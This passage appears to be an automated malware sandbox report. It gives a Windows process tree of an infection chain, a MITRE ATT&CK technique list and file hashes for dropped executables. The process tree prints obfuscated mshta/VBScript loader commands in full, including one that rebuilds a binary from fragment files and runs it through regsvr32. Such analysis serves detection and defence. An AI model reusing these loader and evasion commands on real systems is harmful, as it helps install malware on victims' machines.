                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                  taskkill /f /im chrome.exe
                                                                                  3⤵
                                                                                  • Kills process with taskkill
                                                                                  PID:5132
                                                                            • C:\Users\Admin\AppData\Local\Temp\B3B8.exe
                                                                              C:\Users\Admin\AppData\Local\Temp\B3B8.exe
                                                                              1⤵
                                                                              • Executes dropped EXE
                                                                              PID:2208
                                                                            • C:\Users\Admin\AppData\Local\Temp\C1C2.exe
                                                                              C:\Users\Admin\AppData\Local\Temp\C1C2.exe
                                                                              1⤵
                                                                              • Executes dropped EXE
                                                                              PID:4636
                                                                            • C:\Users\Admin\AppData\Local\Temp\CA7E.exe
                                                                              C:\Users\Admin\AppData\Local\Temp\CA7E.exe
                                                                              1⤵
                                                                              • Executes dropped EXE
                                                                              PID:4796
                                                                            • C:\Users\Admin\AppData\Local\Temp\D397.exe
                                                                              C:\Users\Admin\AppData\Local\Temp\D397.exe
                                                                              1⤵
                                                                                PID:4904
                                                                                • C:\Windows\SysWOW64\mshta.exe
                                                                                  "C:\Windows\System32\mshta.exe" VbsCript: clOSE ( CrEAteOBJect ("WscRIPt.ShELL" ). rUN ( "CMd.EXE /q /c Copy /Y ""C:\Users\Admin\AppData\Local\Temp\D397.exe"" ..\IpDIhVj3g.ExE && STARt ..\IpDIhVj3g.EXe /PyPXDDGMMiEeTQRVIP2SQdwWi2M& IF """"=="""" for %s IN ( ""C:\Users\Admin\AppData\Local\Temp\D397.exe"") do taskkill -f /Im ""%~nxs"" " , 0 , truE ) )
                                                                                  2⤵
                                                                                    PID:5068
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      "C:\Windows\System32\cmd.exe" /q /c Copy /Y "C:\Users\Admin\AppData\Local\Temp\D397.exe" ..\IpDIhVj3g.ExE && STARt ..\IpDIhVj3g.EXe /PyPXDDGMMiEeTQRVIP2SQdwWi2M& IF ""=="" for %s IN ( "C:\Users\Admin\AppData\Local\Temp\D397.exe") do taskkill -f /Im "%~nxs"
                                                                                      3⤵
                                                                                        PID:4260
                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          4⤵
                                                                                            PID:736
                                                                                          • C:\Users\Admin\AppData\Local\Temp\IpDIhVj3g.ExE
                                                                                            ..\IpDIhVj3g.EXe /PyPXDDGMMiEeTQRVIP2SQdwWi2M
                                                                                            4⤵
                                                                                            • Executes dropped EXE
                                                                                            PID:484
                                                                                            • C:\Windows\SysWOW64\mshta.exe
                                                                                              "C:\Windows\System32\mshta.exe" VbsCript: clOSE ( CrEAteOBJect ("WscRIPt.ShELL" ). rUN ( "CMd.EXE /q /c Copy /Y ""C:\Users\Admin\AppData\Local\Temp\IpDIhVj3g.ExE"" ..\IpDIhVj3g.ExE && STARt ..\IpDIhVj3g.EXe /PyPXDDGMMiEeTQRVIP2SQdwWi2M& IF ""/PyPXDDGMMiEeTQRVIP2SQdwWi2M""=="""" for %s IN ( ""C:\Users\Admin\AppData\Local\Temp\IpDIhVj3g.ExE"") do taskkill -f /Im ""%~nxs"" " , 0 , truE ) )
                                                                                              5⤵
                                                                                                PID:5364
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  "C:\Windows\System32\cmd.exe" /q /c Copy /Y "C:\Users\Admin\AppData\Local\Temp\IpDIhVj3g.ExE" ..\IpDIhVj3g.ExE && STARt ..\IpDIhVj3g.EXe /PyPXDDGMMiEeTQRVIP2SQdwWi2M& IF "/PyPXDDGMMiEeTQRVIP2SQdwWi2M"=="" for %s IN ( "C:\Users\Admin\AppData\Local\Temp\IpDIhVj3g.ExE") do taskkill -f /Im "%~nxs"
                                                                                                  6⤵
                                                                                                    PID:5632
                                                                                                • C:\Windows\SysWOW64\mshta.exe
                                                                                                  "C:\Windows\System32\mshta.exe" VBSCrIpT: cLose ( CreAteObject( "wSCrIPt.ShelL" ). RUN ( "cMd /Q /C ecHo 6C:\Users\Admin\AppData\Local\TempZwG> QEFuCrB.w &ECHO | SeT /p = ""MZ"" > 0CZKPbA.~i &copy /Y /b 0CZKPBA.~i +HzMuGQn.ebg + 3KLPjZ48.1 + JBBP.aZ +jjD1CZ.Z +ME53U.RD + G8HVV~AW.A + QEFuCRB.w ..\LPHzR4.XZ &sTaRt regsvr32.exe ..\LphZr4.XZ /U -S & dEl /Q * " ,0 , tRuE ) )
                                                                                                  5⤵
                                                                                                    PID:6044
                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                      "C:\Windows\System32\cmd.exe" /Q /C ecHo 6C:\Users\Admin\AppData\Local\TempZwG> QEFuCrB.w &ECHO | SeT /p = "MZ" >0CZKPbA.~i &copy /Y /b 0CZKPBA.~i +HzMuGQn.ebg + 3KLPjZ48.1 + JBBP.aZ +jjD1CZ.Z +ME53U.RD + G8HVV~AW.A + QEFuCRB.w ..\LPHzR4.XZ &sTaRt regsvr32.exe ..\LphZr4.XZ /U -S& dEl /Q *
                                                                                                      6⤵
                                                                                                        PID:4220
                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                          C:\Windows\system32\cmd.exe /S /D /c" ECHO "
                                                                                                          7⤵
                                                                                                          • Executes dropped EXE
                                                                                                          PID:5552
                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                          C:\Windows\system32\cmd.exe /S /D /c" SeT /p = "MZ" 1>0CZKPbA.~i"
                                                                                                          7⤵
                                                                                                            PID:5724
                                                                                                          • C:\Windows\SysWOW64\regsvr32.exe
                                                                                                            regsvr32.exe ..\LphZr4.XZ /U -S
                                                                                                            7⤵
                                                                                                              PID:5800
                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                        taskkill -f /Im "D397.exe"
                                                                                                        4⤵
                                                                                                        • Kills process with taskkill
                                                                                                        PID:2632
                                                                                                • C:\Users\Admin\AppData\Local\Temp\DBE5.exe
                                                                                                  C:\Users\Admin\AppData\Local\Temp\DBE5.exe
                                                                                                  1⤵
                                                                                                  • Executes dropped EXE
                                                                                                  PID:2068
                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 2068 -s 1412
                                                                                                    2⤵
                                                                                                    • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                    • Program crash
                                                                                                    PID:5044
                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                  1⤵
                                                                                                  • Drops file in Windows directory
                                                                                                  • Modifies Internet Explorer settings
                                                                                                  • Modifies registry class
                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                  PID:4120
                                                                                                • C:\Windows\system32\browser_broker.exe
                                                                                                  C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                  1⤵
                                                                                                  • Modifies Internet Explorer settings
                                                                                                  PID:4892
                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                  1⤵
                                                                                                  • Modifies registry class
                                                                                                  • Suspicious behavior: MapViewOfSection
                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                  PID:4556
                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                  1⤵
                                                                                                  • Modifies Internet Explorer settings
                                                                                                  • Modifies registry class
                                                                                                  PID:1808
                                                                                                  • C:\Windows\system32\WerFault.exe
                                                                                                    C:\Windows\system32\WerFault.exe -u -p 1808 -s 1372
                                                                                                    2⤵
                                                                                                    • Program crash
                                                                                                    PID:4200
                                                                                                • C:\Windows\system32\rUNdlL32.eXe
                                                                                                  rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                  1⤵
                                                                                                  • Process spawned unexpected child process
                                                                                                  PID:5348
                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                    rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                    2⤵
                                                                                                    • Loads dropped DLL
                                                                                                    PID:5192
                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                  1⤵
                                                                                                    PID:5068
                                                                                                    • C:\Windows\system32\WerFault.exe
                                                                                                      C:\Windows\system32\WerFault.exe -u -p 5068 -s 1232
                                                                                                      2⤵
                                                                                                      • Program crash
                                                                                                      • Checks processor information in registry
                                                                                                      • Enumerates system info in registry
                                                                                                      PID:4272
                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                    1⤵
                                                                                                    • Modifies registry class
                                                                                                    PID:4076
                                                                                                  • \??\c:\windows\system32\svchost.exe
                                                                                                    c:\windows\system32\svchost.exe -k localservice -s LicenseManager
                                                                                                    1⤵
                                                                                                    • Executes dropped EXE
                                                                                                    PID:4904
                                                                                                  • \??\c:\windows\system32\svchost.exe
                                                                                                    c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                                                    1⤵
                                                                                                    • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                    PID:6840
                                                                                                  • C:\Windows\system32\DllHost.exe
                                                                                                    C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
                                                                                                    1⤵
                                                                                                      PID:3032
                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                      1⤵
                                                                                                      • Modifies registry class
                                                                                                      PID:36
                                                                                                      • C:\Windows\system32\WerFault.exe
                                                                                                        C:\Windows\system32\WerFault.exe -u -p 36 -s 2004
                                                                                                        2⤵
                                                                                                        • Program crash
                                                                                                        PID:5264
                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                      1⤵
                                                                                                        PID:2744
                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                        1⤵
                                                                                                        • Modifies registry class
                                                                                                        PID:5608
                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                        1⤵
                                                                                                        • Modifies registry class
                                                                                                        PID:6976
                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                        1⤵
                                                                                                        • Modifies registry class
                                                                                                        PID:4716
                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                        1⤵
                                                                                                          PID:5604
                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                          1⤵
                                                                                                          • Modifies registry class
                                                                                                          PID:5412
                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                          1⤵
                                                                                                          • Modifies registry class
                                                                                                          PID:676
                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                          1⤵
                                                                                                          • Modifies registry class
                                                                                                          PID:5404
                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                          1⤵
                                                                                                          • Modifies registry class
                                                                                                          PID:6700
                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                          1⤵
                                                                                                          • Modifies registry class
                                                                                                          PID:4164
                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                          1⤵
                                                                                                          • Modifies registry class
                                                                                                          PID:6248
                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                          1⤵
                                                                                                            PID:732

                                                                                                          Network

                                                                                                          MITRE ATT&CK Matrix ATT&CK v6

                                                                                                          Persistence

                                                                                                          New Service

                                                                                                          1
                                                                                                          T1050

                                                                                                          Modify Existing Service

                                                                                                          1
                                                                                                          T1031

                                                                                                          Registry Run Keys / Startup Folder

                                                                                                          1
                                                                                                          T1060

                                                                                                          Privilege Escalation

                                                                                                          New Service

                                                                                                          1
                                                                                                          T1050

                                                                                                          Defense Evasion

                                                                                                          File Permissions Modification

                                                                                                          1
                                                                                                          T1222

                                                                                                          Modify Registry

                                                                                                          3
                                                                                                          T1112

                                                                                                          Install Root Certificate

                                                                                                          1
                                                                                                          T1130

                                                                                                          Credential Access

                                                                                                          Credentials in Files

                                                                                                          3
                                                                                                          T1081

                                                                                                          Discovery

                                                                                                          Software Discovery

                                                                                                          1
                                                                                                          T1518

                                                                                                          Query Registry

                                                                                                          5
                                                                                                          T1012

                                                                                                          System Information Discovery

                                                                                                          6
                                                                                                          T1082

                                                                                                          Peripheral Device Discovery

                                                                                                          1
                                                                                                          T1120

                                                                                                          Remote System Discovery

                                                                                                          1
                                                                                                          T1018

                                                                                                          Collection

                                                                                                          Data from Local System

                                                                                                          3
                                                                                                          T1005

                                                                                                          Command and Control

                                                                                                          Web Service

                                                                                                          1
                                                                                                          T1102

                                                                                                          Replay Monitor

                                                                                                          Loading Replay Monitor...

                                                                                                          Downloads

                                                                                                          • C:\Program Files (x86)\i-record\AForge.Video.FFMPEG.dll
                                                                                                            MD5

                                                                                                            5f60669a79e4c4285325284ab662a0c0

                                                                                                            SHA1

                                                                                                            5b83f8f2799394df3751799605e9292b21b78504

                                                                                                            SHA256

                                                                                                            3f6aa370d70259dc55241950d669d2bf3dc7b57a0c45c6a2f8dec0d8c8cc35b0

                                                                                                            SHA512

                                                                                                            6ec9fe576daa4fde11a39a929dd23ab44297521c4d23352af1a78716cc3ec7927aa6949d5f7af638148e58e5b6d1d16043ad1a7b0dabb8103acc07d0d4c8a42f

                                                                                                          • C:\Program Files (x86)\i-record\I-Record.exe
                                                                                                            MD5

                                                                                                            13c3ba689a19b325a19ab62cbe4c313c

                                                                                                            SHA1

                                                                                                            8b0ba8fc4eab09e5aa958699411479a1ce201a18

                                                                                                            SHA256

                                                                                                            696822fcdd3382ba02dfcce45ec4784d65ef44adf7d1fac2520b81f8ce007cf9

                                                                                                            SHA512

                                                                                                            387095ec1ccfd7f4e2dac8522fd72b3199447ad750133bf3719810952262321845f6590457ab4c950f5cf9c5fda93377710e7b8d940b04d6c80252f1ccf8033e

                                                                                                          • C:\Program Files (x86)\i-record\I-Record.exe
                                                                                                            MD5

                                                                                                            13c3ba689a19b325a19ab62cbe4c313c

                                                                                                            SHA1

                                                                                                            8b0ba8fc4eab09e5aa958699411479a1ce201a18

                                                                                                            SHA256

                                                                                                            696822fcdd3382ba02dfcce45ec4784d65ef44adf7d1fac2520b81f8ce007cf9

                                                                                                            SHA512

                                                                                                            387095ec1ccfd7f4e2dac8522fd72b3199447ad750133bf3719810952262321845f6590457ab4c950f5cf9c5fda93377710e7b8d940b04d6c80252f1ccf8033e

                                                                                                          • C:\Program Files (x86)\i-record\I-Record.exe.config
                                                                                                            MD5

                                                                                                            871947926c323ad2f2148248d9a46837

                                                                                                            SHA1

                                                                                                            0a70fe7442e14ecfadd2932c2fb46b8ddc04ba7a

                                                                                                            SHA256

                                                                                                            f3d7125a0e0f61c215f80b1d25e66c83cd20ed3166790348a53e0b7faf52550e

                                                                                                            SHA512

                                                                                                            58d9687495c839914d3aa6ae16677f43a0fa9a415dbd8336b0fcacd0c741724867b27d62a640c09828b902c69ac8f5d71c64cdadf87199e7637681a5b87da3b7

                                                                                                          • C:\Program Files (x86)\i-record\avcodec-53.dll
                                                                                                            MD5

                                                                                                            65f639a2eda8db2a1ea40b5ddb5a2ed4

                                                                                                            SHA1

                                                                                                            3f32853740928c5e88b15fdc86c95a2ebd8aeb37

                                                                                                            SHA256

                                                                                                            e4e41c0c1c85e2aeaff1bea914880d2cb01b153a1a9ceddccaf05f8b5362210d

                                                                                                            SHA512

                                                                                                            980b6a5511716073d5eeb8b5437c6f23bda300402c64d05d2a54da614e3ef1412743ec5bb4100e54699d7a74f8c437560cb9faa67824cbbabdf1f9399945e21b

                                                                                                          • C:\Program Files (x86)\i-record\avformat-53.dll
                                                                                                            MD5

                                                                                                            11340a55f155a904596bf3a13788a93a

                                                                                                            SHA1

                                                                                                            92a2f79717f71696ebde3c400aa52804eda5984e

                                                                                                            SHA256

                                                                                                            b26b2df18537b3df6706aa9e743d1a1e511a6fd21f7f7815f15ef96bb09a85e9

                                                                                                            SHA512

                                                                                                            2dc2bb8b0b4a38ddee62d85fdf7c551b0b77f5b9c7791cf82a00eea847f86006df5139874381dd6db739bb77ec008be9f32185ec71ca8be603f7fe515662c78b

                                                                                                          • C:\Program Files (x86)\i-record\avutil-51.dll
                                                                                                            MD5

                                                                                                            78128217a6151041fc8f7f29960bdd2a

                                                                                                            SHA1

                                                                                                            a6fe2fa059334871181f60b626352e8325cbdda8

                                                                                                            SHA256

                                                                                                            678ca4d9f4d4ad1703006026afe3df5490664c05bb958b991c028ce9314757f7

                                                                                                            SHA512

                                                                                                            5f534a8b186797046526cfb29f95e89e90c555cf54cc8e99a801dfe9327433c9c0fd2cb63a335ade606075c9fab5173c1ad805242ceb04bc1fd78f37da166d84

                                                                                                          • C:\Program Files (x86)\i-record\swscale-2.dll
                                                                                                            MD5

                                                                                                            564dca64680d608517721cdbe324b1d6

                                                                                                            SHA1

                                                                                                            f2683fa13772fc85c3ea4cffa3d896373a603ad3

                                                                                                            SHA256

                                                                                                            f9550ace57ce5b19add143e507179dc601a832b054963d1c3b5c003f1a8149cc

                                                                                                            SHA512

                                                                                                            1d80e9de29320201c988e8b11036c423d83620e99bcadec5142eb14b6513e49d9b41904e92154139e327cd5cc6f058b4bb467ee4fbb342794296e0dfe774dc75

                                                                                                          • C:\Program Files\Google\XXAUHEAEUZ\irecord.exe
                                                                                                            MD5

                                                                                                            f3e69396bfcb70ee59a828705593171a

                                                                                                            SHA1

                                                                                                            d4df6a67e0f7af5385613256dbf485e1f2886c55

                                                                                                            SHA256

                                                                                                            c970b8146afbd7347f5488fd821ae6ade4f355dcb29d764b7834ce8a1754105f

                                                                                                            SHA512

                                                                                                            4743b9bf562c1b8616f794493123160de95ba15451affacf286aff6d2af023a07d7942a8753c3fdccf8d294f99b46adee8ac58f6a29d42dea973a9de6a77d22f

                                                                                                          • C:\Program Files\Google\XXAUHEAEUZ\irecord.exe
                                                                                                            MD5

                                                                                                            f3e69396bfcb70ee59a828705593171a

                                                                                                            SHA1

                                                                                                            d4df6a67e0f7af5385613256dbf485e1f2886c55

                                                                                                            SHA256

                                                                                                            c970b8146afbd7347f5488fd821ae6ade4f355dcb29d764b7834ce8a1754105f

                                                                                                            SHA512

                                                                                                            4743b9bf562c1b8616f794493123160de95ba15451affacf286aff6d2af023a07d7942a8753c3fdccf8d294f99b46adee8ac58f6a29d42dea973a9de6a77d22f

                                                                                                          • C:\ProgramData\Microsoft\Windows\Start Menu\Programs\i-record.lnk
                                                                                                            MD5

                                                                                                            54b6d8ce4b2996de21323da1eeeda7cf

                                                                                                            SHA1

                                                                                                            02a102ceb4dc813cb09a5432e45dd322bac72530

                                                                                                            SHA256

                                                                                                            e0e1c4b192a8e57b016becd8a05db31c8b060d95460abb4a02b6571526af7900

                                                                                                            SHA512

                                                                                                            7b3cab9d07a29f55e4c388dbf501dab1cecd71de3bacc131d3c95e1724b6606448fb536ae2f8c414a026b9ac16634cdc8bc1ecf88d77226f3ed32e93c97b32f8

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\18E8.exe
                                                                                                            MD5

                                                                                                            bb35bb9ea4b0a054f1b49a251038124f

                                                                                                            SHA1

                                                                                                            a93fc50812a36fee2eacbaed55a2726a225e78f9

                                                                                                            SHA256

                                                                                                            7634f10383a10de7ef2c184caaee5882cca80e21bf5642d7a63c179f8d3ef69c

                                                                                                            SHA512

                                                                                                            da935ba7571ecae1f2df3e89e728ed8cbe62acdbb09f1831a50665527a2f66504b41fb53572d9cd7ab63f61396e65d22d4e98ae5bf8bb6d20821eb1c5e7021e9

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\18E8.exe
                                                                                                            MD5

                                                                                                            bb35bb9ea4b0a054f1b49a251038124f

                                                                                                            SHA1

                                                                                                            a93fc50812a36fee2eacbaed55a2726a225e78f9

                                                                                                            SHA256

                                                                                                            7634f10383a10de7ef2c184caaee5882cca80e21bf5642d7a63c179f8d3ef69c

                                                                                                            SHA512

                                                                                                            da935ba7571ecae1f2df3e89e728ed8cbe62acdbb09f1831a50665527a2f66504b41fb53572d9cd7ab63f61396e65d22d4e98ae5bf8bb6d20821eb1c5e7021e9

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7263.exe
                                                                                                            MD5

                                                                                                            0d53a936fac69fd51e0665679c2054a9

                                                                                                            SHA1

                                                                                                            49ae732d0fa1b3d31b641951d684d61aa77ff334

                                                                                                            SHA256

                                                                                                            d1215f78c8f0150c45cbb3d8536ff02a67a40b8f94d3e5c8157b613e20ef91e9

                                                                                                            SHA512

                                                                                                            2becef9bdee726e9c136250277968e1b7a84f2f0059b4e50fa5369aa2af1796c01281df7c3f9e4b663856a8518db63c932b1b9c06cb7cff00853c54b2bbc2d4a

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7263.exe
                                                                                                            MD5

                                                                                                            0d53a936fac69fd51e0665679c2054a9

                                                                                                            SHA1

                                                                                                            49ae732d0fa1b3d31b641951d684d61aa77ff334

                                                                                                            SHA256

                                                                                                            d1215f78c8f0150c45cbb3d8536ff02a67a40b8f94d3e5c8157b613e20ef91e9

                                                                                                            SHA512

                                                                                                            2becef9bdee726e9c136250277968e1b7a84f2f0059b4e50fa5369aa2af1796c01281df7c3f9e4b663856a8518db63c932b1b9c06cb7cff00853c54b2bbc2d4a

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7263.exe
                                                                                                            MD5

                                                                                                            0d53a936fac69fd51e0665679c2054a9

                                                                                                            SHA1

                                                                                                            49ae732d0fa1b3d31b641951d684d61aa77ff334

                                                                                                            SHA256

                                                                                                            d1215f78c8f0150c45cbb3d8536ff02a67a40b8f94d3e5c8157b613e20ef91e9

                                                                                                            SHA512

                                                                                                            2becef9bdee726e9c136250277968e1b7a84f2f0059b4e50fa5369aa2af1796c01281df7c3f9e4b663856a8518db63c932b1b9c06cb7cff00853c54b2bbc2d4a

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7263.exe
                                                                                                            MD5

                                                                                                            0d53a936fac69fd51e0665679c2054a9

                                                                                                            SHA1

                                                                                                            49ae732d0fa1b3d31b641951d684d61aa77ff334

                                                                                                            SHA256

                                                                                                            d1215f78c8f0150c45cbb3d8536ff02a67a40b8f94d3e5c8157b613e20ef91e9

                                                                                                            SHA512

                                                                                                            2becef9bdee726e9c136250277968e1b7a84f2f0059b4e50fa5369aa2af1796c01281df7c3f9e4b663856a8518db63c932b1b9c06cb7cff00853c54b2bbc2d4a

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\82-0ee01-857-f97b1-048bb1f0a8cb6\Fylaedopidi.exe
                                                                                                            MD5

                                                                                                            583b59604757d561e7741874c1116cb3

                                                                                                            SHA1

                                                                                                            eec947e5872c3c8d2cd4c9326799f3204b272a6e

                                                                                                            SHA256

                                                                                                            44e34db60417cd1cfb667fb733316cf6b68db71ec02767ebcb82dfed3cd661db

                                                                                                            SHA512

                                                                                                            8b58e1ec7d67666ac4d1b47f043c6ec9f87f1a950e81b06d752b8ef5500aac03d9aa7c9ba2b72e8b66016ec222382ebff79971a788e9fa5349ad884e4ff57976

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\82-0ee01-857-f97b1-048bb1f0a8cb6\Fylaedopidi.exe
                                                                                                            MD5

                                                                                                            583b59604757d561e7741874c1116cb3

                                                                                                            SHA1

                                                                                                            eec947e5872c3c8d2cd4c9326799f3204b272a6e

                                                                                                            SHA256

                                                                                                            44e34db60417cd1cfb667fb733316cf6b68db71ec02767ebcb82dfed3cd661db

                                                                                                            SHA512

                                                                                                            8b58e1ec7d67666ac4d1b47f043c6ec9f87f1a950e81b06d752b8ef5500aac03d9aa7c9ba2b72e8b66016ec222382ebff79971a788e9fa5349ad884e4ff57976

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\82-0ee01-857-f97b1-048bb1f0a8cb6\Fylaedopidi.exe.config
                                                                                                            MD5

                                                                                                            98d2687aec923f98c37f7cda8de0eb19

                                                                                                            SHA1

                                                                                                            f6dcfcdcfe570340ecdbbd9e2a61f3cb4f281ba7

                                                                                                            SHA256

                                                                                                            8a94163256a722ef8cc140bcd115a5b8f8725c04fe158b129d47be81cb693465

                                                                                                            SHA512

                                                                                                            95c7290d59749df8df495e04789c1793265e0f34e0d091df5c0d4aefe1af4c8ac1f5460f1f198fc28c4c8c900827b8f22e2851957bbaea5914ea962b3a1d0590

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\82-0ee01-857-f97b1-048bb1f0a8cb6\Kenessey.txt
                                                                                                            MD5

                                                                                                            97384261b8bbf966df16e5ad509922db

                                                                                                            SHA1

                                                                                                            2fc42d37fee2c81d767e09fb298b70c748940f86

                                                                                                            SHA256

